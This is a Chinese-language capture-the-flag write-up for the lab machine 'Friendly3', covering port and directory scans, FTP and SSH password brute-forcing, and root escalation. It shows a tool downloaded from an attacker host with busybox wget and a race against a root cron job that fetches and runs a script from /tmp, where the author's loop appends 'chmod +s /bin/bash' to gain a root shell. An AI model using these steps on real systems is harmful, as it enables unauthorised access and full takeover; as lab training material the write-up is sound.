Friendly3
Friendly3
信息搜集
端口扫描
1
rustscan -a 172.20.10.5 -- -A
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
Open 172.20.10.5:21
Open 172.20.10.5:22
Open 172.20.10.5:80
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack vsftpd 3.0.3
22/tcp open ssh syn-ack OpenSSH 9.2p1 Debian 2 (protocol 2.0)
| ssh-hostkey:
| 256 bc:46:3d:85:18:bf:c7:bb:14:26:9a:20:6c:d3:39:52 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFC2DVBfq6sqSsCS9Jg+TZN7bqZ4U5G/tKb5dD3M69VVHwPRuMmify8CmxFhlP33nMhZTvYSZIpjGuiPSjks5UA=
| 256 7b:13:5a:46:a5:62:33:09:24:9d:3e:67:b6:eb:3f:a1 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICDxFT3mwConXgCXORTtuda6Onx3sMQgZb6CzY2tWc3l
80/tcp open http syn-ack nginx 1.22.1
|_http-title: Welcome to nginx!
|_http-server-header: nginx/1.22.1
| http-methods:
|_ Supported Methods: GET HEAD
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
目录扫描
1
gobuster dir -u http://172.20.10.5 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,zip,git,jpg,txt,png
没有扫到东西。
漏洞发现
踩点
1
2
3
4
Hi, sysadmin
I want you to know that I've just uploaded the new files into the FTP Server.
See you,
juan.
爆破FTP
查看一下FTP,尝试匿名登录,我尝试了一下名字:
1
2
3
4
5
6
7
admin
root
ftp
anonymous
juan
sysadmin
juan.
都不行,尝试爆破juan和sysadmin:
得到用户
juan
alexis
查看:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
┌──(kali💀kali)-[~/temp/Friendly3]
└─$ ftp 172.20.10.5
Connected to 172.20.10.5.
220 (vsFTPd 3.0.3)
Name (172.20.10.5:kali): juan
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> pwd
Remote directory: /
ftp> ls -la
229 Entering Extended Passive Mode (|||51316|)
150 Here comes the directory listing.
drwxr-xr-x 14 0 0 4096 Jun 25 2023 .
drwxr-xr-x 14 0 0 4096 Jun 25 2023 ..
-rw-r--r-- 1 0 0 0 Jun 25 2023 file1
-rw-r--r-- 1 0 0 0 Jun 25 2023 file10
-rw-r--r-- 1 0 0 0 Jun 25 2023 file100
-rw-r--r-- 1 0 0 0 Jun 25 2023 file11
-rw-r--r-- 1 0 0 0 Jun 25 2023 file12
-rw-r--r-- 1 0 0 0 Jun 25 2023 file13
-rw-r--r-- 1 0 0 0 Jun 25 2023 file14
-rw-r--r-- 1 0 0 0 Jun 25 2023 file15
-rw-r--r-- 1 0 0 0 Jun 25 2023 file16
-rw-r--r-- 1 0 0 0 Jun 25 2023 file17
-rw-r--r-- 1 0 0 0 Jun 25 2023 file18
-rw-r--r-- 1 0 0 0 Jun 25 2023 file19
-rw-r--r-- 1 0 0 0 Jun 25 2023 file2
-rw-r--r-- 1 0 0 0 Jun 25 2023 file20
-rw-r--r-- 1 0 0 0 Jun 25 2023 file21
-rw-r--r-- 1 0 0 0 Jun 25 2023 file22
-rw-r--r-- 1 0 0 0 Jun 25 2023 file23
-rw-r--r-- 1 0 0 0 Jun 25 2023 file24
-rw-r--r-- 1 0 0 0 Jun 25 2023 file25
-rw-r--r-- 1 0 0 0 Jun 25 2023 file26
-rw-r--r-- 1 0 0 0 Jun 25 2023 file27
-rw-r--r-- 1 0 0 0 Jun 25 2023 file28
-rw-r--r-- 1 0 0 0 Jun 25 2023 file29
-rw-r--r-- 1 0 0 0 Jun 25 2023 file3
-rw-r--r-- 1 0 0 0 Jun 25 2023 file30
-rw-r--r-- 1 0 0 0 Jun 25 2023 file31
-rw-r--r-- 1 0 0 0 Jun 25 2023 file32
-rw-r--r-- 1 0 0 0 Jun 25 2023 file33
-rw-r--r-- 1 0 0 0 Jun 25 2023 file34
-rw-r--r-- 1 0 0 0 Jun 25 2023 file35
-rw-r--r-- 1 0 0 0 Jun 25 2023 file36
-rw-r--r-- 1 0 0 0 Jun 25 2023 file37
-rw-r--r-- 1 0 0 0 Jun 25 2023 file38
-rw-r--r-- 1 0 0 0 Jun 25 2023 file39
-rw-r--r-- 1 0 0 0 Jun 25 2023 file4
-rw-r--r-- 1 0 0 0 Jun 25 2023 file40
-rw-r--r-- 1 0 0 0 Jun 25 2023 file41
-rw-r--r-- 1 0 0 0 Jun 25 2023 file42
-rw-r--r-- 1 0 0 0 Jun 25 2023 file43
-rw-r--r-- 1 0 0 0 Jun 25 2023 file44
-rw-r--r-- 1 0 0 0 Jun 25 2023 file45
-rw-r--r-- 1 0 0 0 Jun 25 2023 file46
-rw-r--r-- 1 0 0 0 Jun 25 2023 file47
-rw-r--r-- 1 0 0 0 Jun 25 2023 file48
-rw-r--r-- 1 0 0 0 Jun 25 2023 file49
-rw-r--r-- 1 0 0 0 Jun 25 2023 file5
-rw-r--r-- 1 0 0 0 Jun 25 2023 file50
-rw-r--r-- 1 0 0 0 Jun 25 2023 file51
-rw-r--r-- 1 0 0 0 Jun 25 2023 file52
-rw-r--r-- 1 0 0 0 Jun 25 2023 file53
-rw-r--r-- 1 0 0 0 Jun 25 2023 file54
-rw-r--r-- 1 0 0 0 Jun 25 2023 file55
-rw-r--r-- 1 0 0 0 Jun 25 2023 file56
-rw-r--r-- 1 0 0 0 Jun 25 2023 file57
-rw-r--r-- 1 0 0 0 Jun 25 2023 file58
-rw-r--r-- 1 0 0 0 Jun 25 2023 file59
-rw-r--r-- 1 0 0 0 Jun 25 2023 file6
-rw-r--r-- 1 0 0 0 Jun 25 2023 file60
-rw-r--r-- 1 0 0 0 Jun 25 2023 file61
-rw-r--r-- 1 0 0 0 Jun 25 2023 file62
-rw-r--r-- 1 0 0 0 Jun 25 2023 file63
-rw-r--r-- 1 0 0 0 Jun 25 2023 file64
-rw-r--r-- 1 0 0 0 Jun 25 2023 file65
-rw-r--r-- 1 0 0 0 Jun 25 2023 file66
-rw-r--r-- 1 0 0 0 Jun 25 2023 file67
-rw-r--r-- 1 0 0 0 Jun 25 2023 file68
-rw-r--r-- 1 0 0 0 Jun 25 2023 file69
-rw-r--r-- 1 0 0 0 Jun 25 2023 file7
-rw-r--r-- 1 0 0 0 Jun 25 2023 file70
-rw-r--r-- 1 0 0 0 Jun 25 2023 file71
-rw-r--r-- 1 0 0 0 Jun 25 2023 file72
-rw-r--r-- 1 0 0 0 Jun 25 2023 file73
-rw-r--r-- 1 0 0 0 Jun 25 2023 file74
-rw-r--r-- 1 0 0 0 Jun 25 2023 file75
-rw-r--r-- 1 0 0 0 Jun 25 2023 file76
-rw-r--r-- 1 0 0 0 Jun 25 2023 file77
-rw-r--r-- 1 0 0 0 Jun 25 2023 file78
-rw-r--r-- 1 0 0 0 Jun 25 2023 file79
-rw-r--r-- 1 0 0 0 Jun 25 2023 file8
-rw-r--r-- 1 0 0 36 Jun 25 2023 file80
-rw-r--r-- 1 0 0 0 Jun 25 2023 file81
-rw-r--r-- 1 0 0 0 Jun 25 2023 file82
-rw-r--r-- 1 0 0 0 Jun 25 2023 file83
-rw-r--r-- 1 0 0 0 Jun 25 2023 file84
-rw-r--r-- 1 0 0 0 Jun 25 2023 file85
-rw-r--r-- 1 0 0 0 Jun 25 2023 file86
-rw-r--r-- 1 0 0 0 Jun 25 2023 file87
-rw-r--r-- 1 0 0 0 Jun 25 2023 file88
-rw-r--r-- 1 0 0 0 Jun 25 2023 file89
-rw-r--r-- 1 0 0 0 Jun 25 2023 file9
-rw-r--r-- 1 0 0 0 Jun 25 2023 file90
-rw-r--r-- 1 0 0 0 Jun 25 2023 file91
-rw-r--r-- 1 0 0 0 Jun 25 2023 file92
-rw-r--r-- 1 0 0 0 Jun 25 2023 file93
-rw-r--r-- 1 0 0 0 Jun 25 2023 file94
-rw-r--r-- 1 0 0 0 Jun 25 2023 file95
-rw-r--r-- 1 0 0 0 Jun 25 2023 file96
-rw-r--r-- 1 0 0 0 Jun 25 2023 file97
-rw-r--r-- 1 0 0 0 Jun 25 2023 file98
-rw-r--r-- 1 0 0 0 Jun 25 2023 file99
drwxr-xr-x 2 0 0 4096 Jun 25 2023 fold10
drwxr-xr-x 2 0 0 4096 Jun 25 2023 fold11
drwxr-xr-x 2 0 0 4096 Jun 25 2023 fold12
drwxr-xr-x 2 0 0 4096 Jun 25 2023 fold13
drwxr-xr-x 2 0 0 4096 Jun 25 2023 fold14
drwxr-xr-x 2 0 0 4096 Jun 25 2023 fold15
drwxr-xr-x 2 0 0 4096 Jun 25 2023 fold4
drwxr-xr-x 2 0 0 4096 Jun 25 2023 fold5
drwxr-xr-x 2 0 0 4096 Jun 25 2023 fold6
drwxr-xr-x 2 0 0 4096 Jun 25 2023 fold7
drwxr-xr-x 2 0 0 4096 Jun 25 2023 fold8
drwxr-xr-x 2 0 0 4096 Jun 25 2023 fold9
-rw-r--r-- 1 0 0 58 Jun 25 2023 fole32
226 Directory send OK.
ftp> get file80
local: file80 remote: file80
229 Entering Extended Passive Mode (|||21632|)
150 Opening BINARY mode data connection for file80 (36 bytes).
100% |***********************************************************************************************************| 36 0.39 KiB/s 00:00 ETA
226 Transfer complete.
36 bytes received in 00:00 (0.38 KiB/s)
ftp> get fole32
local: fole32 remote: fole32
229 Entering Extended Passive Mode (|||14269|)
150 Opening BINARY mode data connection for fole32 (58 bytes).
100% |***********************************************************************************************************| 58 92.09 KiB/s 00:00 ETA
226 Transfer complete.
58 bytes received in 00:00 (55.15 KiB/s)
ftp> get fold10
local: fold10 remote: fold10
229 Entering Extended Passive Mode (|||46237|)
550 Failed to open file.
ftp> cd fold10
250 Directory successfully changed.
ftp> ls -la
229 Entering Extended Passive Mode (|||38694|)
150 Here comes the directory listing.
drwxr-xr-x 2 0 0 4096 Jun 25 2023 .
drwxr-xr-x 14 0 0 4096 Jun 25 2023 ..
-rw-r--r-- 1 0 0 163 Jun 25 2023 .test.txt
226 Directory send OK.
ftp> get .test.txt
local: .test.txt remote: .test.txt
229 Entering Extended Passive Mode (|||45645|)
150 Opening BINARY mode data connection for .test.txt (163 bytes).
100% |***********************************************************************************************************| 163 1.78 KiB/s 00:00 ETA
226 Transfer complete.
163 bytes received in 00:00 (1.77 KiB/s)
ftp> exit
221 Goodbye.
1
2
3
4
5
6
7
8
9
10
11
┌──(kali💀kali)-[~/temp/Friendly3]
└─$ cat file80
Hi, I'm the sysadmin. I am bored...
┌──(kali💀kali)-[~/temp/Friendly3]
└─$ cat fole32
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabba
┌──(kali💀kali)-[~/temp/Friendly3]
└─$ cat .test.txt
Hi, I'am juan another time. I want you to know that I found "cookie" in a file called "zlcnffjbeq.gkg" into my home folder. I think it's from another user, IDK...
什么玩意?暂时没啥用了,看来是,尝试ssh爆破,顺便试一下是否是相同密码:
看来不用爆破了,但是还是让他在后面跑吧,等下,出来辣:
提权
信息搜集
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
juan@friendly3:~$ ls -la
total 28
drwxr-xr-x 3 juan juan 4096 Jul 17 2023 .
drwxr-xr-x 4 root root 4096 Jun 25 2023 ..
lrwxrwxrwx 1 root root 9 Jun 25 2023 .bash_history -> /dev/null
-rw-r--r-- 1 juan juan 220 Apr 23 2023 .bash_logout
-rw-r--r-- 1 juan juan 3526 Apr 23 2023 .bashrc
drwxr-xr-x 14 root root 4096 Jun 25 2023 ftp
-rw-r--r-- 1 juan juan 807 Apr 23 2023 .profile
-r-------- 1 juan juan 33 Jul 17 2023 user.txt
juan@friendly3:~$ cat user.txt
cb40b159c8086733d57280de3f97de30
juan@friendly3:~$ find . -name zlcnffjbeq.gkg 2>/dev/null
juan@friendly3:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
ftp:x:100:108:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin
juan:x:1001:1001::/home/juan:/bin/bash
messagebus:x:101:109::/nonexistent:/usr/sbin/nologin
sshd:x:102:65534::/run/sshd:/usr/sbin/nologin
blue:x:1002:1002::/home/blue:/bin/bash
juan@friendly3:~$ cd ..
juan@friendly3:/home$ ls -la
total 16
drwxr-xr-x 4 root root 4096 Jun 25 2023 .
drwxr-xr-x 18 root root 4096 Jun 25 2023 ..
drwxr-xr-x 2 blue blue 4096 Jun 25 2023 blue
drwxr-xr-x 3 juan juan 4096 Jul 17 2023 juan
juan@friendly3:/home$ cd blue
juan@friendly3:/home/blue$ ls -la
total 20
drwxr-xr-x 2 blue blue 4096 Jun 25 2023 .
drwxr-xr-x 4 root root 4096 Jun 25 2023 ..
lrwxrwxrwx 1 root root 9 Jun 25 2023 .bash_history -> /dev/null
-rw-r--r-- 1 blue blue 220 Apr 23 2023 .bash_logout
-rw-r--r-- 1 blue blue 3526 Apr 23 2023 .bashrc
-rw-r--r-- 1 blue blue 807 Apr 23 2023 .profile
juan@friendly3:/home/blue$ find / -name zlcnffjbeq.gkg 2>/dev/null
juan@friendly3:/home/blue$ find / -user blue -name *.txt 2>/dev/null
juan@friendly3:/home/blue$ find / -user juan -name *.txt 2>/dev/null
/home/juan/user.txt
juan@friendly3:/home/blue$ find / -user root -name *.txt 2>/dev/null
/home/juan/ftp/fold8/passwd.txt
/home/juan/ftp/fold10/.test.txt
/home/juan/ftp/fold5/yt.txt
/var/cache/dictionaries-common/ispell-dicts-list.txt
/usr/share/vim/vim90/doc/help.txt
/usr/share/doc/publicsuffix/examples/test_psl.txt
/usr/share/doc/openssl/fingerprints.txt
/usr/share/doc/openssl/HOWTO/keys.txt
/usr/share/doc/vsftpd/examples/VIRTUAL_USERS/logins.txt
/usr/share/doc/libdb5.3/build_signature_amd64.txt
/usr/share/doc/mount/mount.txt
/usr/share/doc/util-linux/howto-debug.txt
/usr/share/doc/util-linux/release-schedule.txt
/usr/share/doc/util-linux/howto-man-page.txt
/usr/share/doc/util-linux/col.txt
/usr/share/doc/util-linux/pg.txt
/usr/share/doc/util-linux/howto-tests.txt
/usr/share/doc/util-linux/getopt.txt
/usr/share/doc/util-linux/getopt_changelog.txt
/usr/share/doc/util-linux/cal.txt
/usr/share/doc/util-linux/hwclock.txt
/usr/share/doc/util-linux/howto-build-sys.txt
/usr/share/doc/util-linux/PAM-configuration.txt
/usr/share/doc/util-linux/howto-compilation.txt
/usr/share/doc/util-linux/mount.txt
/usr/share/doc/util-linux/deprecated.txt
/usr/share/doc/util-linux/modems-with-agetty.txt
/usr/share/doc/util-linux/blkid.txt
/usr/share/doc/util-linux/00-about-docs.txt
/usr/share/doc/busybox/syslog.conf.txt
juan@friendly3:/home/blue$ cat /home/juan/ftp/fold8/passwd.txt
⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠟⠛⠛⠛⠋⠉⠉⠉⠉⠉⠉⠉⠉⠉⠉⠉⠉⠉⠙⠛⠛⠛⠿⠻⠿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠋⠀⠀⠀⠀⠀⡀⠠⠤⠒⢂⣉⣉⣉⣑⣒⣒⠒⠒⠒⠒⠒⠒⠒⠀⠀⠐⠒⠚⠻⠿⠿⣿⣿⣿⣿⣿⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣿⠏⠀⠀⠀⠀⡠⠔⠉⣀⠔⠒⠉⣀⣀⠀⠀⠀⣀⡀⠈⠉⠑⠒⠒⠒⠒⠒⠈⠉⠉⠉⠁⠂⠀⠈⠙⢿⣿⣿⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣿⠇⠀⠀⠀⠔⠁⠠⠖⠡⠔⠊⠀⠀⠀⠀⠀⠀⠀⠐⡄⠀⠀⠀⠀⠀⠀⡄⠀⠀⠀⠀⠉⠲⢄⠀⠀⠀⠈⣿⣿⣿⣿⣿
⣿⣿⣿⣿⣿⣿⠋⠀⠀⠀⠀⠀⠀⠀⠊⠀⢀⣀⣤⣤⣤⣤⣀⠀⠀⠀⢸⠀⠀⠀⠀⠀⠜⠀⠀⠀⠀⣀⡀⠀⠈⠃⠀⠀⠀⠸⣿⣿⣿⣿
⣿⣿⣿⣿⡿⠥⠐⠂⠀⠀⠀⠀⡄⠀⠰⢺⣿⣿⣿⣿⣿⣟⠀⠈⠐⢤⠀⠀⠀⠀⠀⠀⢀⣠⣶⣾⣯⠀⠀⠉⠂⠀⠠⠤⢄⣀⠙⢿⣿⣿
⣿⡿⠋⠡⠐⠈⣉⠭⠤⠤⢄⡀⠈⠀⠈⠁⠉⠁⡠⠀⠀⠀⠉⠐⠠⠔⠀⠀⠀⠀⠀⠲⣿⠿⠛⠛⠓⠒⠂⠀⠀⠀⠀⠀⠀⠠⡉⢢⠙⣿
⣿⠀⢀⠁⠀⠊⠀⠀⠀⠀⠀⠈⠁⠒⠂⠀⠒⠊⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡇⠀⠀⠀⠀⠀⢀⣀⡠⠔⠒⠒⠂⠀⠈⠀⡇⣿
⣿⠀⢸⠀⠀⠀⢀⣀⡠⠋⠓⠤⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠄⠀⠀⠀⠀⠀⠀⠈⠢⠤⡀⠀⠀⠀⠀⠀⠀⢠⠀⠀⠀⡠⠀⡇⣿
⣿⡀⠘⠀⠀⠀⠀⠀⠘⡄⠀⠀⠀⠈⠑⡦⢄⣀⠀⠀⠐⠒⠁⢸⠀⠀⠠⠒⠄⠀⠀⠀⠀⠀⢀⠇⠀⣀⡀⠀⠀⢀⢾⡆⠀⠈⡀⠎⣸⣿
⣿⣿⣄⡈⠢⠀⠀⠀⠀⠘⣶⣄⡀⠀⠀⡇⠀⠀⠈⠉⠒⠢⡤⣀⡀⠀⠀⠀⠀⠀⠐⠦⠤⠒⠁⠀⠀⠀⠀⣀⢴⠁⠀⢷⠀⠀⠀⢰⣿⣿
⣿⣿⣿⣿⣇⠂⠀⠀⠀⠀⠈⢂⠀⠈⠹⡧⣀⠀⠀⠀⠀⠀⡇⠀⠀⠉⠉⠉⢱⠒⠒⠒⠒⢖⠒⠒⠂⠙⠏⠀⠘⡀⠀⢸⠀⠀⠀⣿⣿⣿
⣿⣿⣿⣿⣿⣧⠀⠀⠀⠀⠀⠀⠑⠄⠰⠀⠀⠁⠐⠲⣤⣴⣄⡀⠀⠀⠀⠀⢸⠀⠀⠀⠀⢸⠀⠀⠀⠀⢠⠀⣠⣷⣶⣿⠀⠀⢰⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣧⠀⠀⠀⠀⠀⠀⠀⠁⢀⠀⠀⠀⠀⠀⡙⠋⠙⠓⠲⢤⣤⣷⣤⣤⣤⣤⣾⣦⣤⣤⣶⣿⣿⣿⣿⡟⢹⠀⠀⢸⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣧⡀⠀⠀⠀⠀⠀⠀⠀⠑⠀⢄⠀⡰⠁⠀⠀⠀⠀⠀⠈⠉⠁⠈⠉⠻⠋⠉⠛⢛⠉⠉⢹⠁⢀⢇⠎⠀⠀⢸⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣿⣿⣦⣀⠈⠢⢄⡉⠂⠄⡀⠀⠈⠒⠢⠄⠀⢀⣀⣀⣰⠀⠀⠀⠀⠀⠀⠀⠀⡀⠀⢀⣎⠀⠼⠊⠀⠀⠀⠘⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣄⡀⠉⠢⢄⡈⠑⠢⢄⡀⠀⠀⠀⠀⠀⠀⠉⠉⠉⠉⠉⠉⠉⠉⠉⠉⠁⠀⠀⢀⠀⠀⠀⠀⠀⢻⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣦⣀⡈⠑⠢⢄⡀⠈⠑⠒⠤⠄⣀⣀⠀⠉⠉⠉⠉⠀⠀⠀⣀⡀⠤⠂⠁⠀⢀⠆⠀⠀⢸⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣦⣄⡀⠁⠉⠒⠂⠤⠤⣀⣀⣉⡉⠉⠉⠉⠉⢀⣀⣀⡠⠤⠒⠈⠀⠀⠀⠀⣸⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣶⣤⣄⣀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣰⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣶⣶⣶⣶⣤⣤⣤⣤⣀⣀⣤⣤⣤⣶⣾⣿⣿⣿⣿⣿
juan@friendly3:/home/blue$ cat /home/juan/ftp/fold5/yt.txt
Thanks to all my YT subscribers!
借着信息搜集:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
juan@friendly3:/home/blue$ sudo -l
-bash: sudo: command not found
juan@friendly3:/home/blue$ cd /
juan@friendly3:/$ ls -la
total 68
drwxr-xr-x 18 root root 4096 Jun 25 2023 .
drwxr-xr-x 18 root root 4096 Jun 25 2023 ..
lrwxrwxrwx 1 root root 7 Jun 25 2023 bin -> usr/bin
drwxr-xr-x 3 root root 4096 Jun 25 2023 boot
drwxr-xr-x 17 root root 3300 Apr 14 05:34 dev
drwxr-xr-x 63 root root 4096 Apr 14 05:34 etc
drwxr-xr-x 4 root root 4096 Jun 25 2023 home
lrwxrwxrwx 1 root root 29 Jun 25 2023 initrd.img -> boot/initrd.img-6.1.0-9-amd64
lrwxrwxrwx 1 root root 29 Jun 25 2023 initrd.img.old -> boot/initrd.img-6.1.0-9-amd64
lrwxrwxrwx 1 root root 7 Jun 25 2023 lib -> usr/lib
lrwxrwxrwx 1 root root 9 Jun 25 2023 lib32 -> usr/lib32
lrwxrwxrwx 1 root root 9 Jun 25 2023 lib64 -> usr/lib64
lrwxrwxrwx 1 root root 10 Jun 25 2023 libx32 -> usr/libx32
drwx------ 2 root root 16384 Jun 25 2023 lost+found
drwxr-xr-x 3 root root 4096 Jun 25 2023 media
drwxr-xr-x 2 root root 4096 Jun 25 2023 mnt
drwxr-xr-x 2 root root 4096 Jun 25 2023 opt
dr-xr-xr-x 140 root root 0 Apr 14 05:33 proc
drwx------ 4 root root 4096 Jul 17 2023 root
drwxr-xr-x 17 root root 540 Apr 14 06:04 run
lrwxrwxrwx 1 root root 8 Jun 25 2023 sbin -> usr/sbin
drwxr-xr-x 3 root root 4096 Jun 25 2023 srv
dr-xr-xr-x 13 root root 0 Apr 14 05:33 sys
drwxrwxrwt 7 root root 4096 Apr 14 06:09 tmp
drwxr-xr-x 14 root root 4096 Jun 25 2023 usr
drwxr-xr-x 12 root root 4096 Jun 25 2023 var
lrwxrwxrwx 1 root root 26 Jun 25 2023 vmlinuz -> boot/vmlinuz-6.1.0-9-amd64
lrwxrwxrwx 1 root root 26 Jun 25 2023 vmlinuz.old -> boot/vmlinuz-6.1.0-9-amd64
juan@friendly3:/$ cat /etc/cron*
cat: /etc/cron.d: Is a directory
cat: /etc/cron.daily: Is a directory
cat: /etc/cron.hourly: Is a directory
cat: /etc/cron.monthly: Is a directory
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || { cd / && run-parts --report /etc/cron.daily; }
47 6 * * 7 root test -x /usr/sbin/anacron || { cd / && run-parts --report /etc/cron.weekly; }
52 6 1 * * root test -x /usr/sbin/anacron || { cd / && run-parts --report /etc/cron.monthly; }
#
cat: /etc/cron.weekly: Is a directory
cat: /etc/cron.yearly: Is a directory
juan@friendly3:/$ cd opt
juan@friendly3:/opt$ ls -la
total 12
drwxr-xr-x 2 root root 4096 Jun 25 2023 .
drwxr-xr-x 18 root root 4096 Jun 25 2023 ..
-rwxr-xr-x 1 root root 190 Jun 25 2023 check_for_install.sh
juan@friendly3:/opt$ cat check_for_install.sh
#!/bin/bash
/usr/bin/curl "http://127.0.0.1/9842734723948024.bash" > /tmp/a.bash
chmod +x /tmp/a.bash
chmod +r /tmp/a.bash
chmod +w /tmp/a.bash
/bin/bash /tmp/a.bash
rm -rf /tmp/a.bash
juan@friendly3:/opt$ cd /tmp
juan@friendly3:/tmp$ wget http://172.20.10.8:8888/pspy64
-bash: wget: command not found
juan@friendly3:/tmp$ busybox wget http://172.20.10.8:8888/pspy64
Connecting to 172.20.10.8:8888 (172.20.10.8:8888)
saving to 'pspy64'
pspy64 100% |***********************************************************************| 4364k 0:00:00 ETA
'pspy64' saved
juan@friendly3:/tmp$ chmod +x pspy64
juan@friendly3:/tmp$ ./pspy64
看到了一个疑似可以利用的脚本,传一个pspy64上去,看看是否是定时任务:
确实是定时任务,尝试见缝插针写个脚本利用一下:
1
2
3
4
5
#!/bin/sh
while true:
do
echo "chmod + s /bin/bash" >> a.bash
done
1
2
juan@friendly3:/tmp$ ./exp.sh
./exp.sh: line 1: 1:: command not found
what?直接执行吧。。。。。
1
while true;do echo 'chmod +s /bin/bash' >> a.bash;done
拿到shell!!
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
juan@friendly3:/tmp$ ls -l /bin/bash
-rwxr-xr-x 1 root root 1265648 Apr 23 2023 /bin/bash
juan@friendly3:/tmp$ while true;do echo 'chmod +s /bin/bash' >> a.bash;done
^Cchmod +s /bin/bash
juan@friendly3:/tmp$ ls -l /bin/bash
-rwsr-sr-x 1 root root 1265648 Apr 23 2023 /bin/bash
juan@friendly3:/tmp$ bash -p
bash-5.2# cd /root
bash-5.2# ls -la
total 40
drwx------ 4 root root 4096 Jul 17 2023 .
drwxr-xr-x 18 root root 4096 Jun 25 2023 ..
lrwxrwxrwx 1 root root 9 Jun 25 2023 .bash_history -> /dev/null
-rw-r--r-- 1 root root 571 Apr 10 2021 .bashrc
-r-xr-xr-x 1 root root 509 Jun 25 2023 interfaces.sh
-rw------- 1 root root 20 Jun 25 2023 .lesshst
drwxr-xr-x 3 root root 4096 Jun 25 2023 .local
-rw-r--r-- 1 root root 161 Jul 9 2019 .profile
-r-------- 1 root root 33 Jul 17 2023 root.txt
-rw-r--r-- 1 root root 66 Jun 25 2023 .selected_editor
